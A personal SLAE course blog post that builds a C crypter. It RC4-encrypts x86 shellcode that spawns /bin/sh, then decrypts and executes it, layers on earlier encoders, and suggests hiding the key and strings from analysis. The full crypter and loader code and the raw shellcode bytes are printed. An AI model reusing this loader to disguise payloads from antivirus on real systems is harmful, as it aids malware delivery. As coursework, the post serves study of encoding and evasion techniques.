Amonsec

Encrypt / Decrypt Intel x86 shellcode with RC4 algorithm

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:
http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert/
Student ID: SLAE-975
Assignment number: #7
GitHub repository: https://github.com/amonsec/SLAE/tree/master/assignment-7

This post is part of my SLAE series.

You can find the previous post at this address: https://amonsec.net/training/linux-assembly-x86/2018/polymorphism-examples-with-linux-intel-x86-shellcodes

 

Introduction

Disclaimer

  • I’m not a cryptanalyst;
  • My math knowledge is not awesome and
  • I’m not the creator of the RC4 algorithm.

In this last SLAE assignment blog post, we will discuss crypters and how we can create a C wrapper that encrypts and decrypts our shellcode.

Requirements:

  • Linux distribution, in my case Ubuntu 10.04 LTS (x86);
  • A mouse (not the animal) and
  • A java (not the programming language).
 

About RC4 / ARCFOUR

The RC4 algorithm is pretty interesting and easy to understand for people who have never dealt with cryptography, like me. First of all, RC4 was designed by Ron Rivest of RSA Security in 1987, and its description was leaked in 1994. Second, RC4 is a stream cipher: it is a symmetric-key algorithm in which the plaintext bytes, in our case our shellcode, are combined with a pseudo-random keystream. RC4 was widely used in Wi-Fi equipment for years because Wired Equivalent Privacy (WEP) is based on it, and the way WEP uses RC4 is one of the main reasons why WEP is so weak.

RC4 has four stages:

  • First, initialise an array of 256 bytes;
  • Second, run the key scheduling algorithm (KSA);
  • Third, run the pseudo-random generation algorithm (PRGA) to produce the keystream and
  • Fourth, XOR the plaintext bytes with the generated keystream.

Advantages:

  • Easy to implement/use;
  • Based on a XOR operation, so we can use the same code to encrypt and decrypt our shellcode and
  • Does not require heavy computation.
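
The second advantage can be illustrated with a small sketch: XORing a buffer twice with the same keystream gives back the original bytes. The helper name `xor_buffer` is hypothetical and chosen only for this illustration; in the real crypter the keystream comes from RC4, not from a fixed array.

```c
#include <assert.h>
#include <stddef.h>

/* Hypothetical helper: XOR each byte of data with the matching keystream byte. */
void xor_buffer(unsigned char *data, const unsigned char *keystream, size_t len) {
    size_t n;

    assert(data != NULL && keystream != NULL);
    for (n = 0; n < len; n++) {
        data[n] ^= keystream[n];
    }
}
```

Calling `xor_buffer` once on the plaintext "encrypts" it, and calling it a second time with the same keystream "decrypts" it, which is why a single loop is enough for both directions.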

Disadvantages:

  • Based on a single XOR operation, so it is unlikely to bypass modern AV or IDS on its own and
  • RC4 is old and considered cryptographically weak.

 

For more information about RC4 you can read the Wikipedia page: https://en.wikipedia.org/wiki/RC4

 

Building time!

I obviously did not create the following algorithm. I only translated into C the pseudo-code that you can find here:
https://en.wikipedia.org/wiki/RC4#Description

As previously written, the first thing we need to create is the initialization phase, where we populate an array with the 256 values from 0 to 255.

#define BYTE_ARRAY 256

int initialize(void) {
    int x;

    for (x = 0; x < BYTE_ARRAY; x++) {
        s[x] = x;
    }

    i = j = 0;
    return 1;
}

Then, we need a function that permutes the values in our array, driven by the key, so that we end up with a thoroughly mixed array:

void swap(unsigned char *one, unsigned char *two) {
    char tmp = *one;

    *one = *two;
    *two = tmp;
}

int key_sheduling(unsigned char *key, int lenKey) {
    for (i = 0; i < BYTE_ARRAY; i++) {
        j = (j + s[i] + key[i % lenKey]) % BYTE_ARRAY;
        swap(&s[i], &s[j]);
    }

    i = j = 0;
    return 1;
}
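
A quick sanity check for this step: key scheduling only swaps entries, so afterwards the array must still contain every value from 0 to 255 exactly once. The sketch below redoes the initialization and key scheduling on a caller-supplied array (rather than the global `s`) so that it is self-contained; `ksa` and `is_permutation` are hypothetical names used only for this illustration.

```c
#include <assert.h>
#include <stddef.h>

#define BYTE_ARRAY 256

/* Identity fill followed by the RC4 key scheduling loop, on a local array. */
void ksa(unsigned char *state, const unsigned char *key, size_t lenKey) {
    int i, j = 0;
    unsigned char tmp;

    assert(lenKey > 0);                 /* avoid a modulo by zero */
    for (i = 0; i < BYTE_ARRAY; i++) {
        state[i] = (unsigned char)i;
    }
    for (i = 0; i < BYTE_ARRAY; i++) {
        j = (j + state[i] + key[i % lenKey]) % BYTE_ARRAY;
        tmp = state[i];
        state[i] = state[j];
        state[j] = tmp;
    }
}

/* Returns 1 if state holds each value 0..255 exactly once, 0 otherwise. */
int is_permutation(const unsigned char *state) {
    unsigned char seen[BYTE_ARRAY] = {0};
    int i;

    for (i = 0; i < BYTE_ARRAY; i++) {
        if (seen[state[i]]) {
            return 0;
        }
        seen[state[i]] = 1;
    }
    return 1;
}
```

If `is_permutation` ever returned 0 after `ksa`, it would point to a bug in the swap or in the index arithmetic.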

Now, we need to create the function that generates the pseudo-random keystream, one byte per call:

char pseudo_random(void) {
    i = (i + 1) % BYTE_ARRAY;
    j = (j + s[i]) % BYTE_ARRAY;
    swap(&s[i], &s[j]);

    return s[(s[i] + s[j]) % BYTE_ARRAY];
}

Finally, we can XOR our plaintext with the pseudo-randomly generated keystream:

for (count = 0; count < shellcodeLenght; count++) {

        pseudoRandomByte = pseudo_random();
        encryptedByte = shellcode[count] ^ pseudoRandomByte;
        shellcode[count] = encryptedByte;
}

If we assemble all the pieces, we get something like this:

#include <stdio.h>
#include <string.h>

#define BYTE_ARRAY 256
unsigned char s[BYTE_ARRAY];
int i;
int j;

unsigned char shellcode[] = \
"our shellcode";

void swap(unsigned char *one, unsigned char *two) {
    char tmp = *one;

    *one = *two;
    *two = tmp;
}

int initialize(void) {
    int x;

    for (x = 0; x < BYTE_ARRAY; x++) {
        s[x] = x;
    }

    i = j = 0;
    return 1;
}

int key_sheduling(unsigned char *key, int lenKey) {
    for (i = 0; i < BYTE_ARRAY; i++) {
        j = (j + s[i] + key[i % lenKey]) % BYTE_ARRAY;
        swap(&s[i], &s[j]);
    }

    i = j = 0;
    return 1;
}

char pseudo_random(void) {
    i = (i + 1) % BYTE_ARRAY;
    j = (j + s[i]) % BYTE_ARRAY;
    swap(&s[i], &s[j]);

    return s[(s[i] + s[j]) % BYTE_ARRAY];
}

int main(int argc, char **argv) {

    unsigned char key[] = "ch3rn0bylMysl4V3slUT";
    unsigned char pseudoRandomByte;
    unsigned char encryptedByte;
    int shellcodeLenght = strlen(shellcode);
    int lenKey = strlen(key);
    int count;

    initialize();
    key_sheduling(key, lenKey);

    for (count = 0; count < shellcodeLenght; count++) {

        pseudoRandomByte = pseudo_random();
        encryptedByte = shellcode[count] ^ pseudoRandomByte;
        shellcode[count] = encryptedByte;
    }
}
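
One way to check a translation like the one above is to compare it against a known test vector. The sketch below keeps the state in a struct instead of globals so it is self-contained; the names `rc4_ctx`, `rc4_init` and `rc4_crypt` are hypothetical and not part of the original code. The Wikipedia page linked earlier lists a test vector (key "Key", plaintext "Plaintext", ciphertext BBF316E8D940AF0AD3) that such a sketch should reproduce.

```c
#include <assert.h>
#include <stddef.h>

#define BYTE_ARRAY 256

/* Hypothetical context: permutation array plus the two RC4 indices. */
typedef struct {
    unsigned char s[BYTE_ARRAY];
    int i;
    int j;
} rc4_ctx;

static void rc4_swap(unsigned char *one, unsigned char *two) {
    unsigned char tmp = *one;

    *one = *two;
    *two = tmp;
}

/* Initialization and key scheduling in one call. */
void rc4_init(rc4_ctx *ctx, const unsigned char *key, size_t lenKey) {
    int i, j = 0;

    assert(ctx != NULL && key != NULL && lenKey > 0);
    for (i = 0; i < BYTE_ARRAY; i++) {
        ctx->s[i] = (unsigned char)i;
    }
    for (i = 0; i < BYTE_ARRAY; i++) {
        j = (j + ctx->s[i] + key[i % lenKey]) % BYTE_ARRAY;
        rc4_swap(&ctx->s[i], &ctx->s[j]);
    }
    ctx->i = ctx->j = 0;
}

/* XOR len bytes of data in place with the generated keystream. */
void rc4_crypt(rc4_ctx *ctx, unsigned char *data, size_t len) {
    size_t n;

    for (n = 0; n < len; n++) {
        ctx->i = (ctx->i + 1) % BYTE_ARRAY;
        ctx->j = (ctx->j + ctx->s[ctx->i]) % BYTE_ARRAY;
        rc4_swap(&ctx->s[ctx->i], &ctx->s[ctx->j]);
        data[n] ^= ctx->s[(ctx->s[ctx->i] + ctx->s[ctx->j]) % BYTE_ARRAY];
    }
}
```

Calling `rc4_init` with the same key and then `rc4_crypt` a second time on the ciphertext should give back the plaintext, since both directions use the same keystream.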
 

Encrypt / Decrypt

We have created the skeleton of our next two C programs: the program that will encrypt our shellcode, and the program that will decrypt it and then execute it.

For this example I chose a basic shellcode that will spawn a shell:

unsigned char shellcode[] = \
"\x31\xc0\x50\x89\xe2\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\xb0\x0b\xcd\x80";
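
One assumption worth flagging before going further: the programs in this post measure the shellcode with `strlen`, which stops at the first zero byte. This shellcode contains none, but an encrypted buffer may, in which case only part of it would be processed. Here is a minimal sketch of the difference, using a made-up buffer named `sample` and a hypothetical helper `has_zero_byte` (neither comes from the original post):

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/* Made-up 5-byte buffer with a zero byte in the middle (illustration only). */
unsigned char sample[] = "\x31\xc0\x00\x50\x89";

/* Size taken from the array itself, minus the terminator added by the literal. */
#define SAMPLE_LEN (sizeof(sample) - 1)

/* Returns 1 if buf contains a zero byte in its first len bytes, 0 otherwise. */
int has_zero_byte(const unsigned char *buf, size_t len) {
    assert(buf != NULL);
    return memchr(buf, 0, len) != NULL;
}
```

Here `strlen((const char *)sample)` stops at the embedded zero byte, while `SAMPLE_LEN` covers the whole buffer. Running `has_zero_byte` on the encrypted output is a cheap way to know whether `strlen` can still be trusted for it.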

With a few modifications to the previous main function, we can create the C program that will encrypt our shellcode:

#include <stdio.h>
#include <string.h>

#define BYTE_ARRAY 256
unsigned char s[BYTE_ARRAY];
int i;
int j;

unsigned char shellcode[] = \
"\x31\xc0\x50\x89\xe2\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\xb0\x0b\xcd\x80";

void swap(unsigned char *one, unsigned char *two) {
    char tmp = *one;

    *one = *two;
    *two = tmp;
}

int initialize(void) {
    int x;

    for (x = 0; x < BYTE_ARRAY; x++) {
        s[x] = x;
    }

    i = j = 0;
    return 1;
}

int key_sheduling(unsigned char *key, int lenKey) {
    for (i = 0; i < BYTE_ARRAY; i++) {
        j = (j + s[i] + key[i % lenKey]) % BYTE_ARRAY;
        swap(&s[i], &s[j]);
    }

    i = j = 0;
    return 1;
}

char pseudo_random(void) {
    i = (i + 1) % BYTE_ARRAY;
    j = (j + s[i]) % BYTE_ARRAY;
    swap(&s[i], &s[j]);

    return s[(s[i] + s[j]) % BYTE_ARRAY];
}

int main(int argc, char **argv) {

    unsigned char key[] = "ch3rn0bylMysl4V3slUT";
    unsigned char pseudoRandomByte;
    unsigned char encryptedByte;
    int shellcodeLenght = strlen(shellcode);
    int lenKey = strlen(key);
    int count;

    initialize();
    key_sheduling(key, lenKey);

    printf("[*] Bytes parsing\n");
    for (count = 0; count < shellcodeLenght; count++) {

        pseudoRandomByte = pseudo_random();
        encryptedByte = shellcode[count] ^ pseudoRandomByte;
        shellcode[count] = encryptedByte;
        printf("\\x%.2x", encryptedByte);

    }
}

amonsec@ubuntu:/opt/slae/assignment-7$ !gcc
gcc encoder.c -o encoder -fno-stack-protector -z execstack
amonsec@ubuntu:/opt/slae/assignment-7$ ./encoder
\xbd\xbc\x17\x30\x53\x61\x2e\xdf\x49\x5b\x0a\x76\x98\x39\xd0\x5f\x0f\x5b\xb2\x97\xb8\xa3
amonsec@ubuntu:/opt/slae/assignment-7$

Nice. Now we can reuse the same code with the encrypted shellcode, add a call to the decrypted buffer, then compile the C wrapper and execute it:

#include <stdio.h>
#include <string.h>

#define BYTE_ARRAY 256
unsigned char s[BYTE_ARRAY];
int i;
int j;

unsigned char shellcode[] = \
"\xbd\xbc\x17\x30\x53\x61\x2e\xdf\x49\x5b\x0a\x76\x98\x39\xd0\x5f\x0f\x5b\xb2\x97\xb8\xa3";

void swap(unsigned char *one, unsigned char *two) {
    char tmp = *one;

    *one = *two;
    *two = tmp;
}

int initialize(void) {
    int x;

    for (x = 0; x < BYTE_ARRAY; x++) {
        s[x] = x;
    }

    i = j = 0;
    return 1;
}

int key_sheduling(unsigned char *key, int lenKey) {
    for (i = 0; i < BYTE_ARRAY; i++) {
        j = (j + s[i] + key[i % lenKey]) % BYTE_ARRAY;
        swap(&s[i], &s[j]);
    }

    i = j = 0;
    return 1;
}

char pseudo_random(void) {
    i = (i + 1) % BYTE_ARRAY;
    j = (j + s[i]) % BYTE_ARRAY;
    swap(&s[i], &s[j]);

    return s[(s[i] + s[j]) % BYTE_ARRAY];
}

int main(int argc, char **argv) {

    unsigned char key[] = "ch3rn0bylMysl4V3slUT";
    unsigned char pseudoRandomByte;
    unsigned char encryptedByte;
    int shellcodeLenght = strlen(shellcode);
    int lenKey = strlen(key);
    int count;

    initialize();
    key_sheduling(key, lenKey);

    for (count = 0; count < shellcodeLenght; count++) {

        pseudoRandomByte = pseudo_random();
        encryptedByte = shellcode[count] ^ pseudoRandomByte;
        shellcode[count] = encryptedByte;
    }

    __asm__(
        "xor %eax, %eax\n\t"
        "xor %ebx, %ebx\n\t"
        "xor %ecx, %ecx\n\t"
        "xor %edx, %edx\n\t"

        "call shellcode"
    );
}

[Screenshot: compilation and execution of the decrypter]

As expected, our shellcode is successfully decrypted with the same algorithm that we used to encrypt it, and finally executed. Note that the key here is a bit funny: it's a nod to Ch3rn0byl, a good guy who made me fall into the awesome world of assembly and exploit dev.

So, I highly recommend reading the awesome exploit dev articles on his website: http://ch3rn0byl.com/

 

Bonus 

As a bonus, because this is my last post in this series, I dug a bit deeper with my basic crypter in order to add other things that I created in previous SLAE blog posts. So, the final code combines the ROT-n XOR encoded shellcode created in assignment four with the ADD 10 encoder seen in assignment six, where we talked about polymorphism.

Final C wrapper:

#include <stdio.h>
#include <string.h>

#define BYTE_ARRAY 256
unsigned char s[BYTE_ARRAY];
int i;
int j;

unsigned char shellcode[] = \
"\x79\x5a\x2f\x82\x7b\x32\xe4\xcb\xe9"
"\x88\x42\xe3\x8a\xed\x8a\x42\xcc\x31"
"\xd8\x0e\x65\x11\x9f\xb0\x96\x84\xf5"
"\x1e\x4b\xb4\x64\x01\x1c\x6a\x4e\x47"
"\x25\x9b\xef\xc6\xcd\x1e\xd5\x15\x2a"
"\x64\x26\x9a\x5e\x19\x1c\xab\xc7\x5a"
"\x6f\x65\xff";

void swap(unsigned char *one, unsigned char *two) {
    char tmp = *one;

    *one = *two;
    *two = tmp;
}

int initialize(void) {
    int x;

    for (x = 0; x < BYTE_ARRAY; x++) {
        s[x] = x;
    }

    i = j = 0;
    return 1;
}

int key_sheduling(unsigned char *key, int lenKey) {
    for (i = 0; i < BYTE_ARRAY; i++) {
        j = (j + s[i] + key[i % lenKey]) % BYTE_ARRAY;
        swap(&s[i], &s[j]);
    }

    i = j = 0;
    return 1;
}

char pseudo_random(void) {
    i = (i + 1) % BYTE_ARRAY;
    j = (j + s[i]) % BYTE_ARRAY;
    swap(&s[i], &s[j]);

    return s[(s[i] + s[j]) % BYTE_ARRAY];
}

void decoder(int shellcodeLenght) {
    int x;

    for(x = 0; x < shellcodeLenght; x++) {
        shellcode[x] = shellcode[x] - 10;
    }
}

int main(int argc, char **argv) {

    unsigned char key[] = "ch3rn0bylMysl4V3slUT";
    unsigned char pseudoRandomByte;
    unsigned char encryptedByte;
    int shellcodeLenght = strlen(shellcode);
    int lenKey = strlen(key);
    int count;

    printf("[*] Start decrypting shellcode..\n");
    printf("[*] Initializing bytearray\n");
    initialize();

    printf("[*] Starting key scheduling algorithm\n");
    key_sheduling(key, lenKey);

    printf("[*] Bytes parsing\n");
    for (count = 0; count < shellcodeLenght; count++) {

        pseudoRandomByte = pseudo_random();
        encryptedByte = shellcode[count] ^ pseudoRandomByte;
        shellcode[count] = encryptedByte;
    }
    printf("[+] Shellcode decrypted!\n");


    printf("[*] Decoding shellcode..\n");
    decoder(shellcodeLenght);
    printf("[+] Shellcode decoded!\n");

    printf("[+] Braaaaaaah I'm a shell!\n");

    __asm__(
        "xor %eax, %eax\n\t"
        "xor %ebx, %ebx\n\t"
        "xor %ecx, %ecx\n\t"
        "xor %edx, %edx\n\t"

        "call shellcode"
    );
}

Note, the encoder can be found in my GitHub repository.
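
For reference, the ADD 10 layer is trivially reversible because `unsigned char` arithmetic wraps modulo 256. The `add10_encode` function below is only a guess at the inverse of the `decoder` function shown above, not the actual encoder from the repository, and both functions work on a caller-supplied buffer instead of the global `shellcode`. The names are hypothetical.

```c
#include <assert.h>
#include <stddef.h>

/* Assumed inverse of decoder(): add 10 to every byte, wrapping modulo 256. */
void add10_encode(unsigned char *buf, size_t len) {
    size_t x;

    assert(buf != NULL);
    for (x = 0; x < len; x++) {
        buf[x] = (unsigned char)(buf[x] + 10);
    }
}

/* Same operation as decoder(), applied to an explicit buffer. */
void sub10_decode(unsigned char *buf, size_t len) {
    size_t x;

    assert(buf != NULL);
    for (x = 0; x < len; x++) {
        buf[x] = (unsigned char)(buf[x] - 10);
    }
}
```

The order of the layers matters: if the bytes were ADD 10 encoded first and RC4 encrypted second, the wrapper has to RC4 decrypt first and subtract 10 second, which is the order used in the main function above.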

Final compilation and execution:

[Screenshot: compilation and execution of the final crypter]

In our case, for ultimate protection, we can remove all the printed messages and, instead of storing the key in a variable, read it from an argument passed to the program at execution time. Otherwise, after compilation, all the strings can be found in plaintext in the binary, and especially the key:

amonsec@ubuntu:/opt/slae/assignment-7$ strings exploit
/lib/ld-linux.so.2
__gmon_start__
libc.so.6
_IO_stdin_used
puts
__libc_start_main
GLIBC_2.0
PTRh
D$-ch3r
D$1n0by
D$5lMys
D$9l4V3
D$=slUT
2D$C
D$L;D$H|
UWVS
[^_]
[*] Start decrypting shellcode..
[*] Initializing bytearray
[*] Starting key scheduling algorithm
[*] Bytes parsing
[+] Shellcode decrypted!
[*] Decoding shellcode..
[+] Shellcode decoded!
[+] Braaaaaaah I'm a shell!
;*2$"
jNG%
amonsec@ubuntu:/opt/slae/assignment-7$
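
A minimal sketch of the command-line idea, assuming the key is given as the first argument; the helper name `key_from_args` is hypothetical and not part of the original program:

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/*
 * Hypothetical helper: returns the key passed as argv[1] and stores its
 * length in *lenKey, or returns NULL when no usable key was supplied.
 */
unsigned char *key_from_args(int argc, char **argv, size_t *lenKey) {
    assert(argv != NULL && lenKey != NULL);
    if (argc < 2 || argv[1][0] == '\0') {
        return NULL;                     /* missing or empty key */
    }
    *lenKey = strlen(argv[1]);
    return (unsigned char *)argv[1];
}
```

In the main function, the result would replace the hard-coded `key` array, and the program should exit early when NULL is returned. With this change the key should no longer show up in the `strings` output, although it may still be visible in the shell history or in the process list while the program runs.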
 

Story end

This is the last post of this series. It was really fun, and I learned a lot of interesting things during this assembly journey. I want to say thanks to Vivek Ramachandran for this awesome course and for always having a big smile in the videos.

For people who don’t know him and his work, you can visit these two websites, where you can learn a huge amount of things for a good price:

 
 
